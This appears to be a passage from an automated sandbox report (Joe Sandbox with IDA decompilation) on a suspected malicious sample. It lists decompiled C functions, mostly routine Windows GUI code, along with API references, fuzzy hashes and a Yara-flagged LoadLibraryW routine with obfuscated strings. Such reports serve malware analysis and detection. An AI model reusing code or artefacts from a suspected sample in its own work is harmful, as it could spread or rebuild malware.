						__eflags =  *((intOrPtr*)(_t100 + 0x20)) - _t97;
						if( *((intOrPtr*)(_t100 + 0x20)) != _t97) {
							E00412D05(_t100, _t97, _t97, _t97, _t97, _t97, 0x97);
						}
					}
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x28) - _t97;
					if( *(_t101 - 0x28) != _t97) {
						E00412C76(_t84, 1);
					}
					__eflags =  *(_t101 - 0x2c) - _t97;
					if( *(_t101 - 0x2c) != _t97) {
						EnableWindow( *(_t101 - 0x14), 1);
					}
					__eflags =  *(_t101 - 0x14) - _t97;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t100 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t101 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t100 + 0x60))();
					E004177E3(_t84, _t100, _t97, _t100, __eflags);
					__eflags =  *(_t100 + 0x58) - _t97;
					if( *(_t100 + 0x58) != _t97) {
						FreeResource( *(_t101 - 0x18));
					}
					_t63 =  *(_t100 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E00431B73(_t63);
				}
			}
















                  0x00417c2d
                  0x00417c2d
                  0x00417c2d
                  0x00417c34
                  0x00417c39
                  0x00417c3b
                  0x00417c41
                  0x00417c47
                  0x00417c4a
                  0x00417c4f
                  0x00417c52
                  0x00417c54
                  0x00417c57
                  0x00417c5e
                  0x00417c6f
                  0x00417c75
                  0x00417c75
                  0x00417c7b
                  0x00417c80
                  0x00417c86
                  0x00417c86
                  0x00417c8c
                  0x00417c96
                  0x00417c9d
                  0x00417ca0
                  0x00417ca5
                  0x00417ca8
                  0x00417cab
                  0x00417cae
                  0x00417cb1
                  0x00417cb9
                  0x00417cbc
                  0x00417cc7
                  0x00417cc9
                  0x00417cd0
                  0x00417cd6
                  0x00417ce2
                  0x00417ce4
                  0x00417ce7
                  0x00417ce9
                  0x00417ced
                  0x00417cf5
                  0x00417cf7
                  0x00417cf9
                  0x00417d00
                  0x00417d02
                  0x00417d06
                  0x00417d08
                  0x00417d0d
                  0x00417d0d
                  0x00417d02
                  0x00417cf7
                  0x00417ce9
                  0x00417cc9
                  0x00417cbc
                  0x00417d14
                  0x00417d19
                  0x00417d21
                  0x00417d26
                  0x00417d27
                  0x00417d28
                  0x00417d2d
                  0x00417d32
                  0x00417d34
                  0x00417d36
                  0x00417d38
                  0x00417d3c
                  0x00417d40
                  0x00417d43
                  0x00417d48
                  0x00417d4d
                  0x00417d51
                  0x00417d51
                  0x00417d55
                  0x00417d5a
                  0x00417d5a
                  0x00417d5a
                  0x00417d5c
                  0x00417d5f
                  0x00417d6d
                  0x00417d6d
                  0x00417d5f
                  0x00417d72
                  0x00417d9d
                  0x00417da0
                  0x00417da6
                  0x00417da6
                  0x00417dab
                  0x00417dae
                  0x00417db5
                  0x00417db5
                  0x00417dbb
                  0x00417dbe
                  0x00417dc6
                  0x00417dc9
                  0x00417dce
                  0x00417dce
                  0x00417dc9
                  0x00417dd8
                  0x00417ddd
                  0x00417de2
                  0x00417de5
                  0x00417dea
                  0x00417dea
                  0x00417df0
                  0x00000000
                  0x00417c8e
                  0x00417c8e
                  0x00417df3
                  0x00417df8
                  0x00417df8

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 00417C34
                  • FindResourceA.KERNEL32(?,?,00000005), ref: 00417C67
                  • LoadResource.KERNEL32(?,00000000), ref: 00417C6F
                    • Part of subcall function 0040EEF5: UnhookWindowsHookEx.USER32(?), ref: 0040EF25
                  • LockResource.KERNEL32(?,00000024,00401950), ref: 00417C80
                  • GetDesktopWindow.USER32 ref: 00417CB3
                  • IsWindowEnabled.USER32(?), ref: 00417CC1
                  • EnableWindow.USER32(?,00000000), ref: 00417CD0
                    • Part of subcall function 00412C5B: IsWindowEnabled.USER32(?), ref: 00412C64
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  • EnableWindow.USER32(?,00000001), ref: 00417DB5
                  • GetActiveWindow.USER32 ref: 00417DC0
                  • SetActiveWindow.USER32(?,?,00000024,00401950), ref: 00417DCE
                  • FreeResource.KERNEL32(?,?,00000024,00401950), ref: 00417DEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                  • String ID:
                  • API String ID: 964565984-0
                  • Opcode ID: da8b189c92737f86523d476402b0640bbffa953fb9a8a761f84fa50aacb807c6
                  • Instruction ID: 5835e455a6056e309436c10977b7ae5060b56ff2e2b656983c9ac1280d1162a1
                  • Opcode Fuzzy Hash: da8b189c92737f86523d476402b0640bbffa953fb9a8a761f84fa50aacb807c6
                  • Instruction Fuzzy Hash: CC519E30A046099FDB21AFA6D8456FEBBB1BF44705F20043EE501B62A1DB789981CB9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040607D, Relevance: 15.1, APIs: 10, Instructions: 141windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E0040607D(int __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HMENU__* _t91;
				int _t92;
				struct HMENU__* _t100;
				int _t105;
				CHAR* _t111;
				signed int* _t116;
				signed int _t127;
				int* _t130;
				int* _t132;
				int _t134;
				void* _t135;

				_t121 = __ebx;
				_push(0x130);
				E00431B04(E0044AC2D, __ebx, __edi, __esi);
				_t132 =  *(_t135 + 0x10);
				 *(_t135 - 0x130) =  *(_t135 + 8);
				_t91 =  *(_t135 + 0xc);
				_t134 = 0;
				 *(_t135 - 0x128) = _t91;
				 *((intOrPtr*)(_t135 - 0x138)) = 0;
				 *(_t135 - 0x134) = 0;
				_t92 = GetMenuItemCount(_t91);
				 *(_t135 - 0x13c) = _t92;
				 *(_t135 - 0x118) = 0;
				 *(_t135 - 0x114) = 0;
				if( *(_t135 + 0x14) == 1) {
					 *(_t135 - 0x114) =  *_t132;
				}
				 *(_t135 - 0x11c) = _t134;
				if(_t92 <= _t134) {
					L25:
					_t132[ *(_t135 + 0x14)] =  *(_t135 - 0x118);
					L26:
					return E00431B87(_t121, _t132, _t134);
				}
				_t134 = 0x400;
				do {
					 *(_t135 - 0x120) = GetSubMenu( *(_t135 - 0x128),  *(_t135 - 0x11c));
					_t121 = GetMenuState( *(_t135 - 0x128),  *(_t135 - 0x11c), _t134);
					if( *(_t135 - 0x120) != 0 || (_t121 & 0x00000800) == 0) {
						 *(_t135 - 0x12c) = 0;
						__eflags =  *(_t135 + 0x18);
						if( *(_t135 + 0x18) != 0) {
							__eflags =  *(_t135 + 0x14) - 5;
							if( *(_t135 + 0x14) == 5) {
								__eflags = _t132[5] - 1;
								if(_t132[5] == 1) {
									 *(_t135 - 0x12c) = GetSubMenu( *(_t135 - 0x130),  *(_t135 - 0x114));
								}
							}
						}
						_t100 = GetMenuStringA( *(_t135 - 0x128),  *(_t135 - 0x11c), _t135 - 0x110, 0x100, _t134);
						__eflags =  *(_t135 - 0x120);
						if( *(_t135 - 0x120) == 0) {
							__eflags = _t100;
							if(_t100 <= 0) {
								goto L23;
							}
							_push(_t135 - 0x110);
							_push(GetMenuItemID( *(_t135 - 0x128),  *(_t135 - 0x11c)));
							_t121 = _t121 | _t134;
							__eflags = _t121;
							_push(_t121);
							goto L22;
						} else {
							__eflags =  *(_t135 - 0x12c);
							if(__eflags == 0) {
								_t105 = GetMenuItemCount( *(_t135 - 0x120));
								__eflags = _t105;
								if(_t105 == 0) {
									goto L23;
								}
								_push(_t135 - 0x110);
								_push( *(_t135 - 0x120));
								_push(_t121 & 0x000000ff | 0x00000410);
								L22:
								InsertMenuA( *(_t135 - 0x130),  *(_t135 - 0x114), ??, ??, ??);
								 *(_t135 - 0x114) =  *(_t135 - 0x114) + 1;
								_t76 = _t135 - 0x118;
								 *_t76 =  *(_t135 - 0x118) + 1;
								__eflags =  *_t76;
								goto L23;
							}
							_push( *((intOrPtr*)(E0041F363(_t121, _t132, _t134, __eflags) + 0x10)));
							E00406039(_t121, _t135 - 0x124, _t130, _t132, _t134, __eflags);
							_t111 =  *(_t135 - 0x124);
							 *(_t135 - 4) =  *(_t135 - 4) & 0x00000000;
							__eflags =  *(_t111 - 0xc);
							if( *(_t111 - 0xc) != 0) {
								E00405D76(_t135 - 0x124, 0x20);
							}
							E00405EC1(_t135 - 0x124, _t135 - 0x110);
							_t121 =  *(_t135 - 0x120);
							AppendMenuA( *(_t135 - 0x12c), 0x10, _t121,  *(_t135 - 0x124));
							 *(_t135 - 4) =  *(_t135 - 4) | 0xffffffff;
							_t116 =  &(_t132[ *(_t135 + 0x14)]);
							 *_t116 =  *_t116 & 0x00000000;
							 *((intOrPtr*)(_t116 - 4)) =  *((intOrPtr*)(_t116 - 4)) + 1;
							 *((intOrPtr*)(_t135 - 0x138)) = 1;
							 *(_t135 - 0x134) = _t121;
							E004010B0( &(( *(_t135 - 0x124))[0xfffffffffffffff0]), _t130);
							goto L23;
						}
					} else {
						_t127 =  *(_t135 + 0x14);
						_t121 =  *(_t135 - 0x118);
						_t130 =  &(_t132[_t127]);
						 *_t130 =  *(_t135 - 0x118);
						 *(_t135 - 0x118) = 0;
						if(_t127 < 5) {
							 *(_t135 - 0x114) =  *(_t135 - 0x114) + _t130[1];
						}
						 *(_t135 + 0x14) =  *(_t135 + 0x14) + 2;
					}
					L23:
					 *(_t135 - 0x11c) =  *(_t135 - 0x11c) + 1;
				} while ( *(_t135 - 0x11c) <  *(_t135 - 0x13c));
				if( *((intOrPtr*)(_t135 - 0x138)) != 0) {
					goto L26;
				}
				goto L25;
			}














                  0x0040607d
                  0x0040607d
                  0x00406087
                  0x0040608f
                  0x00406092
                  0x00406098
                  0x0040609b
                  0x0040609e
                  0x004060a4
                  0x004060aa
                  0x004060b0
                  0x004060ba
                  0x004060c0
                  0x004060c6
                  0x004060cc
                  0x004060d0
                  0x004060d0
                  0x004060d8
                  0x004060de
                  0x004062d0
                  0x004062d9
                  0x004062dc
                  0x004062e7
                  0x004062e7
                  0x004060e4
                  0x004060e9
                  0x00406102
                  0x00406114
                  0x0040611e
                  0x00406153
                  0x00406159
                  0x0040615c
                  0x0040615e
                  0x00406162
                  0x00406164
                  0x00406168
                  0x0040617c
                  0x0040617c
                  0x00406168
                  0x00406162
                  0x0040619b
                  0x004061a1
                  0x004061a8
                  0x00406270
                  0x00406272
                  0x00000000
                  0x00000000
                  0x0040627a
                  0x0040628d
                  0x0040628e
                  0x0040628e
                  0x00406290
                  0x00000000
                  0x004061ae
                  0x004061ae
                  0x004061b5
                  0x0040624e
                  0x00406254
                  0x00406256
                  0x00000000
                  0x00000000
                  0x0040625e
                  0x0040625f
                  0x0040626d
                  0x00406291
                  0x0040629d
                  0x004062a3
                  0x004062a9
                  0x004062a9
                  0x004062a9
                  0x00000000
                  0x004062a9
                  0x004061c0
                  0x004061c9
                  0x004061ce
                  0x004061d4
                  0x004061d8
                  0x004061dc
                  0x004061e6
                  0x004061e6
                  0x004061f8
                  0x00406203
                  0x00406212
                  0x00406221
                  0x00406225
                  0x00406228
                  0x0040622b
                  0x00406231
                  0x0040623b
                  0x00406241
                  0x00000000
                  0x00406241
                  0x00406128
                  0x00406128
                  0x0040612e
                  0x00406134
                  0x00406137
                  0x00406139
                  0x0040613f
                  0x00406144
                  0x00406144
                  0x0040614a
                  0x0040614a
                  0x004062af
                  0x004062af
                  0x004062bb
                  0x004062ce
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$Item$Count$AppendH_prolog3_InsertStateString
                  • String ID:
                  • API String ID: 2171526683-0
                  • Opcode ID: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction ID: 28db6550187b75f0f8ddc5cf35a0011be1a11c4ba9a9efde7d1322a6cca787e0
                  • Opcode Fuzzy Hash: 59b0d03c7a4de24bfd5d3264c4ab79dec59a58f44716801c7520d46a18b6b469
                  • Instruction Fuzzy Hash: ED6103708002289FCB25DF14CD85BD9BBB5FF09314F0141EAE64AA62A1D7745EA1CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02319D18, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 178libraryCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0231A2D8
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: C1g9$Hw$P<Ex$Y[]C$[D`=$tN o$wRR|
                  • API String ID: 1029625771-1834093024
                  • Opcode ID: bdb2cefadae6ef4fc2f273e73e15e094e53ba162edcdad2d3eeaf8416322ddd9
                  • Instruction ID: 1f9c97793bf7886f3a15a817969de9b3796231bed9721534c4e49c1a09fea7d9
                  • Opcode Fuzzy Hash: bdb2cefadae6ef4fc2f273e73e15e094e53ba162edcdad2d3eeaf8416322ddd9
                  • Instruction Fuzzy Hash: AAD1B6B48063ACCBDB64CF829A887CDBB70BB15740F2086C9D1593B214DB750A86CF96
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040A380, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 97%
                  			E0040A380(void* __ebx, signed int __ecx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr* _t34;
				intOrPtr _t36;
				int _t39;
				intOrPtr _t46;
				signed int _t57;
				signed int _t66;
				struct HWND__* _t71;
				void* _t72;

				_t70 = __esi;
				_t58 = __ecx;
				_push(0x18);
				E00431A9B(E0044ACFA, __ebx, __edi, __esi);
				_t57 = __ecx;
				_t34 = __ecx + 0xb8;
				 *_t34 =  *_t34 + 1;
				if( *_t34 <= 1) {
					_t36 = E004105B2(__ecx, __ecx, __edi);
					 *((intOrPtr*)(_t72 - 0x10)) = _t36;
					_t77 = _t36;
					if(_t36 == 0) {
						L2:
						E00406436(_t57, _t58, 0, _t70, _t77);
					}
					 *(_t72 - 0x24) = 0x450028;
					 *((intOrPtr*)(_t72 - 0x20)) = 0;
					 *((intOrPtr*)(_t72 - 0x14)) = 0;
					 *((intOrPtr*)(_t72 - 0x18)) = 0;
					 *(_t72 - 0x1c) = 0;
					 *(_t72 - 4) = 0;
					_t71 = GetWindow(GetDesktopWindow(), 5);
					if(_t71 != 0) {
						do {
							_t39 = IsWindowEnabled(_t71);
							_t79 = _t39;
							if(_t39 != 0 && E0040EE68(_t58, 0, _t71, _t79, _t71) != 0 && E00408105( *((intOrPtr*)( *((intOrPtr*)(_t72 - 0x10)) + 0x20)), _t71) != 0 && SendMessageA(_t71, 0x36c, 0, 0) == 0) {
								EnableWindow(_t71, 0);
								_t58 = _t72 - 0x24;
								E00409F5C(_t72 - 0x24, _t71);
							}
							_t71 = GetWindow(_t71, 2);
						} while (_t71 != 0);
						_t70 =  *(_t72 - 0x1c);
						if(_t70 != 0) {
							_t86 = _t70 > 0;
							if(_t70 > 0) {
								goto L2;
							} else {
								_t66 = 4;
								_t46 = E00404461(_t86,  ~(0 | _t86 > 0x00000000) | (_t70 + 0x00000001) * _t66);
								_t58 = _t70 << 2;
								 *((intOrPtr*)(_t57 + 0xbc)) = _t46;
								 *((intOrPtr*)((_t70 << 2) + _t46)) = 0;
								if((0 |  *((intOrPtr*)(_t72 - 0x20)) != 0x00000000) == 0) {
									goto L2;
								} else {
									E004059F9(0, _t70,  *((intOrPtr*)(_t57 + 0xbc)), _t58,  *((intOrPtr*)(_t72 - 0x20)), _t58);
								}
							}
						}
					}
					 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
					_t34 = E00409F75(_t72 - 0x24);
				}
				return E00431B73(_t34);
			}











                  0x0040a380
                  0x0040a380
                  0x0040a380
                  0x0040a387
                  0x0040a38c
                  0x0040a38e
                  0x0040a394
                  0x0040a399
                  0x0040a39f
                  0x0040a3a6
                  0x0040a3a9
                  0x0040a3ab
                  0x0040a3ad
                  0x0040a3ad
                  0x0040a3ad
                  0x0040a3b2
                  0x0040a3b9
                  0x0040a3bc
                  0x0040a3bf
                  0x0040a3c2
                  0x0040a3c7
                  0x0040a3d7
                  0x0040a3db
                  0x0040a3e1
                  0x0040a3e2
                  0x0040a3e8
                  0x0040a3ea
                  0x0040a41a
                  0x0040a421
                  0x0040a424
                  0x0040a424
                  0x0040a432
                  0x0040a434
                  0x0040a438
                  0x0040a43d
                  0x0040a446
                  0x0040a448
                  0x00000000
                  0x0040a44e
                  0x0040a452
                  0x0040a460
                  0x0040a468
                  0x0040a46b
                  0x0040a471
                  0x0040a47e
                  0x00000000
                  0x0040a484
                  0x0040a48f
                  0x0040a494
                  0x0040a47e
                  0x0040a448
                  0x0040a43d
                  0x0040a497
                  0x0040a49e
                  0x0040a49e
                  0x0040a4a8

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0040A387
                  • GetDesktopWindow.USER32 ref: 0040A3CA
                  • GetWindow.USER32(00000000), ref: 0040A3D1
                  • IsWindowEnabled.USER32(00000000), ref: 0040A3E2
                  • SendMessageA.USER32(00000000,0000036C,00000000,00000000), ref: 0040A40E
                  • EnableWindow.USER32(00000000,00000000), ref: 0040A41A
                  • GetWindow.USER32(00000000,00000002), ref: 0040A42C
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$H_prolog3$DesktopEnableEnabledException@8MessageSendThrow
                  • String ID: (
                  • API String ID: 2907971239-3887548279
                  • Opcode ID: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction ID: 3bb135bf242b6c09986745a0261cf98ccff5f01dbf2b9a6c7ca042f580c0f20a
                  • Opcode Fuzzy Hash: e63a990042588c24a6beb72bb7394faddda122b26c843fd20fc822a59a8eabbc
                  • Instruction Fuzzy Hash: 7D31C4359002209FDB11AF668C499AFBAB8FF45300F55453EE812BB1D1EB784D51CB6D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004105DA, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 69windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E004105DA(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __edi;
				void* _t12;
				void* _t14;
				void* _t15;
				void* _t18;
				void* _t19;
				void* _t29;
				struct HWND__* _t30;
				signed int _t34;
				void* _t37;
				void* _t41;

				_t29 = __ebx;
				_push(__ecx);
				_t37 = __ecx;
				_t12 = E004105B2(__ebx, __ecx, __ecx);
				_t34 = _a4 & 0x0000fff0;
				_t41 = _t12;
				_t14 = _t34 - 0xf040;
				if(_t14 == 0) {
					L11:
					if(_a8 != 0x75 || _t41 == 0) {
						L15:
						_t15 = 0;
						goto L16;
					} else {
						E00412C9D(_t41);
						L14:
						_t15 = 1;
						L16:
						return _t15;
					}
				}
				_t18 = _t14 - 0x10;
				if(_t18 == 0) {
					goto L11;
				}
				_t19 = _t18 - 0x10;
				if(_t19 == 0 || _t19 == 0xa0) {
					if(_t34 == 0xf060 || _a8 != 0) {
						if(_t41 != 0) {
							_push(_t29);
							_t30 =  *(_t37 + 0x20);
							_v8 = GetFocus();
							E0040EE3C(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
							SendMessageA( *(_t41 + 0x20), 0x112, _a4, _a8);
							if(IsWindow(_t30) != 0) {
								SetActiveWindow(_t30);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}















                  0x004105da
                  0x004105df
                  0x004105e2
                  0x004105e4
                  0x004105ec
                  0x004105f2
                  0x004105f6
                  0x004105fb
                  0x0041067b
                  0x00410680
                  0x00410692
                  0x00410692
                  0x00000000
                  0x00410686
                  0x00410688
                  0x0041068d
                  0x0041068f
                  0x00410694
                  0x00410697
                  0x00410697
                  0x00410680
                  0x004105fd
                  0x00410600
                  0x00000000
                  0x00000000
                  0x00410602
                  0x00410605
                  0x00410618
                  0x00410622
                  0x00410624
                  0x00410625
                  0x00410637
                  0x0041063d
                  0x00410650
                  0x00410661
                  0x00410664
                  0x00410664
                  0x0041066e
                  0x00410673
                  0x00410673
                  0x0041066e
                  0x00410622
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ActiveFocus$MessageSend
                  • String ID: u
                  • API String ID: 1556911595-4067256894
                  • Opcode ID: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction ID: b4a469e61909f79723e9443e387843b1e68923f1b743ae53d2218e8cd4b0e9e5
                  • Opcode Fuzzy Hash: 87418f2dc2a614755a69d5c0f0d4f683a1a68f3be1b47742967ac6949befff1e
                  • Instruction Fuzzy Hash: 1A11B432500205ABDB346F76CD08AEF7B65FBC4310F054436E905926A2DAB8CDE0DA98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429FF6, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E00429FF6(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x463404; // 0x38a11573
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E00430650(E00429EA2(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

















                  0x00429ffe
                  0x0042a005
                  0x0042a00a
                  0x0042a013
                  0x0042a016
                  0x0042a019
                  0x0042a01e
                  0x0042a022
                  0x0042a02c
                  0x0042a03b
                  0x0042a03f
                  0x0042a04c
                  0x0042a04e
                  0x0042a050
                  0x0042a050
                  0x0042a06b
                  0x0042a06e
                  0x0042a06e
                  0x0042a074
                  0x0042a074
                  0x0042a07a
                  0x0042a07c
                  0x0042a07c
                  0x0042a097
                  0x0042a097
                  0x0042a026
                  0x0042a02a
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetStockObject.GDI32(00000011), ref: 0042A01E
                  • GetStockObject.GDI32(0000000D), ref: 0042A026
                  • GetObjectA.GDI32(00000000,0000003C,?), ref: 0042A033
                  • GetDC.USER32(00000000), ref: 0042A042
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0042A056
                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 0042A062
                  • ReleaseDC.USER32 ref: 0042A06E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Object$Stock$CapsDeviceRelease
                  • String ID: System
                  • API String ID: 46613423-3470857405
                  • Opcode ID: ad5c652a0884bd3402c9b71701d2c20a5e4dd9a1ca84ffed797b40bd404d96ca
                  • Instruction ID: 037f32019a4b5cb1b5665e51a4fb7870e81da93a7529e5481e8c2198bb38607a
                  • Opcode Fuzzy Hash: ad5c652a0884bd3402c9b71701d2c20a5e4dd9a1ca84ffed797b40bd404d96ca
                  • Instruction Fuzzy Hash: 2011B275B40228EBEB109FA2DC45FAF7B78FB55745F40002AFA01A7281DB749D01CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00421287, Relevance: 13.6, APIs: 9, Instructions: 131timekeyboardCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00421287(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				struct tagPOINT _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t42;
				signed int _t49;
				struct HWND__* _t60;
				intOrPtr _t63;
				intOrPtr* _t64;
				intOrPtr _t66;
				void* _t68;
				void* _t72;
				intOrPtr* _t75;
				intOrPtr _t83;
				void* _t84;
				intOrPtr _t85;
				struct HWND__* _t87;
				intOrPtr _t88;
				intOrPtr* _t89;

				_t76 = __ecx;
				_t89 = __ecx;
				_t42 = GetKeyState(1);
				_t90 = _t42;
				if(_t42 < 0) {
					return _t42;
				}
				_t85 = E0041F396(_t72, _t76, _t84, _t89, _t90);
				_v12 = _t85;
				GetCursorPos( &_v20);
				ScreenToClient( *(_t89 + 0x20),  &_v20);
				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
				_v8 = _t49;
				if(_t49 < 0) {
					_t16 = _t85 + 0x4c;
					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
					__eflags =  *_t16;
					L18:
					if(_v8 < 0) {
						L27:
						if( *(_v12 + 0x4c) == 0xffffffff) {
							KillTimer( *(_t89 + 0x20), 0xe001);
						}
						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
						L30:
						_t53 = 0xe000;
						if(_a4 == 0xe000) {
							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
							if(_v8 >= 0) {
								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
							}
						}
						return _t53;
					}
					ClientToScreen( *(_t89 + 0x20),  &_v20);
					_push(_v20.y);
					_t87 = WindowFromPoint(_v20);
					if(_t87 == 0) {
						L25:
						_t59 = _v12;
						_v8 = _v8 | 0xffffffff;
						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
						L26:
						if(_v8 >= 0) {
							goto L30;
						}
						goto L27;
					}
					_t60 =  *(_t89 + 0x20);
					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
						goto L26;
					} else {
						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 + 0x20));
						}
						if(_t63 == _t87) {
							goto L26;
						} else {
							goto L25;
						}
					}
				}
